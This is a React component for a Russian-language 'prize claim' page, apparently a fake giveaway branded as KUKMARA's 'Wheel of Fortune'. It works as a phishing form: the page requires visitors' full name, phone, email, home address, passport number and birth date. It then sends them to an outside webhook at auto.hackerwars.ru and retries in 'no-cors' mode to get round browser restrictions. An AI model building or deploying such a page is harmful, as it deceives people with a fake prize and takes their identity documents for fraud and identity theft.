import { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import { Label } from '@/components/ui/label';
import { Card, CardContent, CardHeader, CardTitle, CardDescription } from '@/components/ui/card';
import { Link } from 'react-router-dom';
import { useMemo } from 'react';

// Компонент для снежинок
function Snowflake({ delay, duration, left }: { delay: number; duration: number; left: number }) {
  return (
    <div
      className="absolute text-white text-2xl opacity-70 pointer-events-none"
      style={{
        left: `${left}%`,
        animation: `fall ${duration}s linear ${delay}s infinite`,
        top: '-50px',
      }}
    >
      ❄
    </div>
  );
}

export default function ClaimPrize() {
  const navigate = useNavigate();
  const [formData, setFormData] = useState({
    firstName: '',
    middleName: '',
    lastName: '',
    phone: '',
    email: '',
    address: '',
    passport: '',
    birthDate: '',
  });
  const [errors, setErrors] = useState<Record<string, string>>({});
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [isSubmitted, setIsSubmitted] = useState(false);

  // Генерируем снежинки один раз при монтировании компонента
  const snowflakes = useMemo(() => {
    return Array.from({ length: 10 }, () => ({
      delay: Math.random() * 5,
      duration: 5 + Math.random() * 10,
      left: Math.random() * 100,
    }));
  }, []);

  // Генерируем звезды один раз при монтировании компонента
  const stars = useMemo(() => {
    return Array.from({ length: 100 }, (_, i) => ({
      id: i,
      left: Math.random() * 100,
      top: Math.random() * 100,
      width: Math.random() * 3 + 1,
      height: Math.random() * 3 + 1,
      delay: Math.random() * 3,
      duration: 2 + Math.random() * 2,
    }));
  }, []);

  const handleChange = (e: React.ChangeEvent<HTMLInputElement>) => {
    const { name, value } = e.target;
    setFormData(prev => ({ ...prev, [name]: value }));
    // Очищаем ошибку при вводе
    if (errors[name]) {
      setErrors(prev => ({ ...prev, [name]: '' }));
    }
  };

  const validateForm = () => {
    const newErrors: Record<string, string> = {};

    if (!formData.firstName.trim()) {
      newErrors.firstName = 'Имя обязательно для заполнения';
    }

    if (!formData.lastName.trim()) {
      newErrors.lastName = 'Фамилия обязательна для заполнения';
    }

    if (!formData.phone.trim()) {
      newErrors.phone = 'Телефон обязателен для заполнения';
    } else if (!/^[\d\s\-\+\(\)]+$/.test(formData.phone)) {
      newErrors.phone = 'Неверный формат телефона';
    }

    if (!formData.email.trim()) {
      newErrors.email = 'Email обязателен для заполнения';
    } else if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(formData.email)) {
      newErrors.email = 'Неверный формат email';
    }

    if (!formData.address.trim()) {
      newErrors.address = 'Адрес обязателен для заполнения';
    }

    if (!formData.passport.trim()) {
      newErrors.passport = 'Серия и номер паспорта обязательны';
    }

    if (!formData.birthDate.trim()) {
      newErrors.birthDate = 'Дата рождения обязательна';
    }

    setErrors(newErrors);
    return Object.keys(newErrors).length === 0;
  };

  const handleSubmit = async (e: React.FormEvent) => {
    e.preventDefault();
    
    if (!validateForm()) {
      return;
    }

    setIsSubmitting(true);
    
    try {
      // Используем прокси в разработке, прямой URL в продакшене
      const apiUrl = 'https://auto.hackerwars.ru/webhook/3279a9e3-77a1-4eed-979c-451acd101243';

      const requestData = {
        firstName: formData.firstName,
        lastName: formData.lastName,
        middleName: formData.middleName,
        phone: formData.phone,
        email: formData.email,
        address: formData.address,
        passport: formData.passport,
        birthDate: formData.birthDate,
      };

      // Сначала пытаемся отправить с CORS
      try {
        const response = await fetch(apiUrl, {
          method: 'POST',
          mode: 'cors',
          headers: {
            'Content-Type': 'application/json',
            'Accept': 'application/json',
          },
          body: JSON.stringify(requestData),
        });

        if (response.ok || response.type === 'opaque') {
          setIsSubmitting(false);
          setIsSubmitted(true);
          return;
        }
      } catch (corsError) {
        console.warn('CORS запрос не прошел, пробуем no-cors режим:', corsError);
      }

      // Если CORS не работает, используем no-cors режим (запрос отправится, но ответ недоступен)
      await fetch('https://auto.hackerwars.ru/webhook/3279a9e3-77a1-4eed-979c-451acd101243', {
        method: 'POST',
        mode: 'no-cors', // Обходит CORS ограничения
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify(requestData),
      });

      // В режиме no-cors мы не можем проверить ответ, но считаем успешным если нет исключения
      setIsSubmitting(false);
      setIsSubmitted(true);
    } catch (error) {
      console.error('Ошибка отправки формы:', error);
      setIsSubmitting(false);
      setErrors({ submit: 'Произошла ошибка при отправке формы. Пожалуйста, попробуйте еще раз.' });
    }
  };

  if (isSubmitted) {
    return (
      <div className="min-h-screen relative overflow-hidden bg-gradient-to-b from-slate-900 via-blue-900 to-indigo-900 dark:from-gray-950 dark:via-blue-950 dark:to-indigo-950">
        {/* Новогодний фон с звездами */}
        <div className="fixed inset-0 overflow-hidden pointer-events-none">
          {stars.map((star) => (
            <div
              key={star.id}
              className="absolute rounded-full bg-white opacity-60 animate-twinkle"
              style={{
                left: `${star.left}%`,
                top: `${star.top}%`,
                width: `${star.width}px`,
                height: `${star.height}px`,
                animationDelay: `${star.delay}s`,
                animationDuration: `${star.duration}s`,
              }}
            />
          ))}
        </div>

        {/* Анимация падающего снега */}
        <div className="fixed inset-0 overflow-hidden pointer-events-none z-10">
          {snowflakes.map((flake, i) => (
            <Snowflake key={i} delay={flake.delay} duration={flake.duration} left={flake.left} />
          ))}
        </div>

        {/* CSS для анимации снега */}
        <style>{`
          @keyframes fall {
            to {
              transform: translateY(100vh) rotate(360deg);
            }
          }
          @keyframes twinkle {
            0%, 100% { opacity: 0.3; }
            50% { opacity: 1; }
          }
          .animate-twinkle {
            animation: twinkle 2s ease-in-out infinite;
          }
        `}</style>

        {/* Шапка сайта */}
        <header className="relative z-30 bg-white/95 dark:bg-gray-900/95 backdrop-blur-sm border-b border-gray-200 dark:border-gray-700 shadow-sm">
          <div className="container mx-auto px-4">
            <div className="flex items-center justify-between h-16 md:h-20">
              <div className="flex items-center gap-3">
                <div className="flex items-center justify-center w-10 h-10 md:w-12 md:h-12 bg-white rounded-lg shadow-md border border-gray-200">
                  <span className="text-red-600 font-bold text-4xl md:text-xl">K</span>
                </div>
                <div className="flex flex-col">
                  <span className="text-lg md:text-xl font-bold text-red-600 dark:text-red-500 leading-tight">
                    KUKMARA
                  </span>
                  <span className="text-xs text-gray-600 dark:text-gray-400 leading-tight">
                    Колесо Фортуны
                  </span>
                </div>
              </div>
            </div>
          </div>
        </header>

        <div className="relative z-20 flex items-center justify-center min-h-screen p-4 pt-24 md:pt-28">
          <Card className="w-full max-w-2xl bg-white/90 dark:bg-gray-800/90 backdrop-blur-sm shadow-2xl border-2 border-green-500">
            <CardContent className="p-8 text-center">
              <div className="text-6xl mb-6">✅</div>
              <h2 className="text-3xl md:text-4xl font-bold text-green-600 dark:text-green-400 mb-4">
                Заявка успешно отправлена!
              </h2>
              <p className="text-lg text-gray-700 dark:text-gray-300 mb-8">
                Ваши данные получены. Мы свяжемся с вами в ближайшее время для оформления приза.
              </p>
              <Button
                onClick={() => navigate('/')}
                className="bg-gradient-to-r from-blue-600 to-blue-700 hover:from-blue-700 hover:to-blue-800 text-white font-bold px-8 py-6 text-lg"
                size="lg"
              >
                Вернуться на главную
              </Button>
            </CardContent>
          </Card>
        </div>
      </div>
    );
  }

  return (
    <div className="min-h-screen relative overflow-hidden bg-gradient-to-b from-slate-900 via-blue-900 to-indigo-900 dark:from-gray-950 dark:via-blue-950 dark:to-indigo-950">
      {/* Новогодний фон с звездами */}
      <div className="fixed inset-0 overflow-hidden pointer-events-none">
        {stars.map((star) => (
          <div
            key={star.id}
            className="absolute rounded-full bg-white opacity-60 animate-twinkle"
            style={{
              left: `${star.left}%`,
              top: `${star.top}%`,
              width: `${star.width}px`,
              height: `${star.height}px`,
              animationDelay: `${star.delay}s`,
              animationDuration: `${star.duration}s`,
            }}
          />
        ))}
      </div>

      {/* Анимация падающего снега */}
      <div className="fixed inset-0 overflow-hidden pointer-events-none z-10">
        {snowflakes.map((flake, i) => (
          <Snowflake key={i} delay={flake.delay} duration={flake.duration} left={flake.left} />
        ))}
      </div>

      {/* CSS для анимации снега */}
      <style>{`
        @keyframes fall {
          to {
            transform: translateY(100vh) rotate(360deg);
          }
        }
        @keyframes twinkle {
          0%, 100% { opacity: 0.3; }
          50% { opacity: 1; }
        }
        .animate-twinkle {
          animation: twinkle 2s ease-in-out infinite;
        }
      `}</style>

      {/* Шапка сайта */}
      <header className="relative z-30 bg-white/95 dark:bg-gray-900/95 backdrop-blur-sm border-b border-gray-200 dark:border-gray-700 shadow-sm">
        <div className="container mx-auto px-4">
          <div className="flex items-center justify-between h-16 md:h-20">
            <div className="flex items-center gap-3">
              <div className="flex items-center justify-center w-10 h-10 md:w-12 md:h-12 bg-white rounded-lg shadow-md border border-gray-200">
                <span className="text-red-600 font-bold text-4xl md:text-xl">K</span>
              </div>
              <div className="flex flex-col">
                <span className="text-lg md:text-xl font-bold text-red-600 dark:text-red-500 leading-tight">
                  KUKMARA
                </span>
                <span className="text-xs text-gray-600 dark:text-gray-400 leading-tight">
                  Колесо Фортуны
                </span>
              </div>
            </div>

            <nav className="hidden md:flex items-center gap-6">
              <Link
                to="/"
                className="text-gray-700 dark:text-gray-300 hover:text-blue-600 dark:hover:text-blue-400 font-medium transition-colors"
              >
                Главная
              </Link>
              <Link
                to="/wheel"
                className="text-gray-700 dark:text-gray-300 hover:text-blue-600 dark:hover:text-blue-400 font-medium transition-colors"
              >
                Колесо
              </Link>
            </nav>
          </div>
        </div>
      </header>

      {/* Контент с формой */}
      <div className="relative z-20 flex items-center justify-center min-h-screen p-4 pt-24 md:pt-28">
        <Card className="w-full max-w-2xl bg-white/90 dark:bg-gray-800/90 backdrop-blur-sm shadow-2xl border-2 border-yellow-500">
          <CardHeader className="text-center pb-6">
            <CardTitle className="text-3xl md:text-4xl font-bold text-gray-900 dark:text-white mb-2">
              Оформление приза
            </CardTitle>
            <CardDescription className="text-lg text-gray-600 dark:text-gray-400">
              Заполните форму для получения вашего приза
            </CardDescription>
          </CardHeader>
          <CardContent>
             <form onSubmit={handleSubmit} className="space-y-6">
               <div className="grid grid-cols-1 md:grid-cols-3 gap-6">
                 <div className="space-y-2">
                   <Label htmlFor="lastName" className="text-gray-900 dark:text-white">
                     Фамилия <span className="text-red-500">*</span>
                   </Label>
                   <Input
                     id="lastName"
                     name="lastName"
                     value={formData.lastName}
                     onChange={handleChange}
                     placeholder="Введите вашу фамилию"
                     className={errors.lastName ? 'border-red-500' : ''}
                   />
                   {errors.lastName && (
                     <p className="text-sm text-red-500">{errors.lastName}</p>
                   )}
                 </div>

                 <div className="space-y-2">
                   <Label htmlFor="firstName" className="text-gray-900 dark:text-white">
                     Имя <span className="text-red-500">*</span>
                   </Label>
                   <Input
                     id="firstName"
                     name="firstName"
                     value={formData.firstName}
                     onChange={handleChange}
                     placeholder="Введите ваше имя"
                     className={errors.firstName ? 'border-red-500' : ''}
                   />
                   {errors.firstName && (
                     <p className="text-sm text-red-500">{errors.firstName}</p>
                   )}
                 </div>

                 <div className="space-y-2">
                   <Label htmlFor="middleName" className="text-gray-900 dark:text-white">
                     Отчество
                   </Label>
                   <Input
                     id="middleName"
                     name="middleName"
                     value={formData.middleName}
                     onChange={handleChange}
                     placeholder="Введите ваше отчество"
                     className={errors.middleName ? 'border-red-500' : ''}
                   />
                   {errors.middleName && (
                     <p className="text-sm text-red-500">{errors.middleName}</p>
                   )}
                 </div>
               </div>

              <div className="space-y-2">
                <Label htmlFor="phone" className="text-gray-900 dark:text-white">
                  Телефон <span className="text-red-500">*</span>
                </Label>
                <Input
                  id="phone"
                  name="phone"
                  type="tel"
                  value={formData.phone}
                  onChange={handleChange}
                  placeholder="+7 (999) 123-45-67"
                  className={errors.phone ? 'border-red-500' : ''}
                />
                {errors.phone && (
                  <p className="text-sm text-red-500">{errors.phone}</p>
                )}
              </div>

              <div className="space-y-2">
                <Label htmlFor="email" className="text-gray-900 dark:text-white">
                  Email <span className="text-red-500">*</span>
                </Label>
                <Input
                  id="email"
                  name="email"
                  type="email"
                  value={formData.email}
                  onChange={handleChange}
                  placeholder="example@mail.com"
                  className={errors.email ? 'border-red-500' : ''}
                />
                {errors.email && (
                  <p className="text-sm text-red-500">{errors.email}</p>
                )}
              </div>

              <div className="space-y-2">
                <Label htmlFor="address" className="text-gray-900 dark:text-white">
                  Адрес проживания <span className="text-red-500">*</span>
                </Label>
                <Input
                  id="address"
                  name="address"
                  value={formData.address}
                  onChange={handleChange}
                  placeholder="Город, улица, дом, квартира"
                  className={errors.address ? 'border-red-500' : ''}
                />
                {errors.address && (
                  <p className="text-sm text-red-500">{errors.address}</p>
                )}
              </div>

              <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
                <div className="space-y-2">
                  <Label htmlFor="passport" className="text-gray-900 dark:text-white">
                    Серия и номер паспорта <span className="text-red-500">*</span>
                  </Label>
                  <Input
                    id="passport"
                    name="passport"
                    value={formData.passport}
                    onChange={handleChange}
                    placeholder="1234 567890"
                    className={errors.passport ? 'border-red-500' : ''}
                  />
                  {errors.passport && (
                    <p className="text-sm text-red-500">{errors.passport}</p>
                  )}
                </div>

                <div className="space-y-2">
                  <Label htmlFor="birthDate" className="text-gray-900 dark:text-white">
                    Дата рождения <span className="text-red-500">*</span>
                  </Label>
                  <Input
                    id="birthDate"
                    name="birthDate"
                    type="date"
                    value={formData.birthDate}
                    onChange={handleChange}
                    className={errors.birthDate ? 'border-red-500' : ''}
                  />
                  {errors.birthDate && (
                    <p className="text-sm text-red-500">{errors.birthDate}</p>
                  )}
                </div>
              </div>

              {errors.submit && (
                <div className="p-4 bg-red-100 dark:bg-red-900/30 border border-red-400 text-red-700 dark:text-red-400 rounded-lg">
                  <p className="text-sm font-medium">{errors.submit}</p>
                </div>
              )}
              <div className="pt-4">
                <Button
                  type="submit"
                  disabled={isSubmitting}
                  className="w-full bg-gradient-to-r from-green-500 to-green-600 hover:from-green-600 hover:to-green-700 text-white font-bold py-6 text-lg disabled:opacity-50 disabled:cursor-not-allowed"
                  size="lg"
                >
                  {isSubmitting ? (
                    <div className="flex items-center justify-center">
                      <div className="animate-spin rounded-full h-5 w-5 border-b-2 border-white mr-2"></div>
                      Отправка...
                    </div>
                  ) : (
                    'Отправить заявку'
                  )}
                </Button>
              </div>
            </form>
          </CardContent>
        </Card>
      </div>

      {/* Футер */}
      <footer className="relative z-20 text-center py-8 border-t border-white/20">
        <p className="text-yellow-200 mb-2">
          © 2013-2026 KUKMARA
        </p>
        <p className="text-yellow-200">
          Контактный центр: +7 (800) 333-93-45
        </p>
      </footer>
    </div>
  );
}

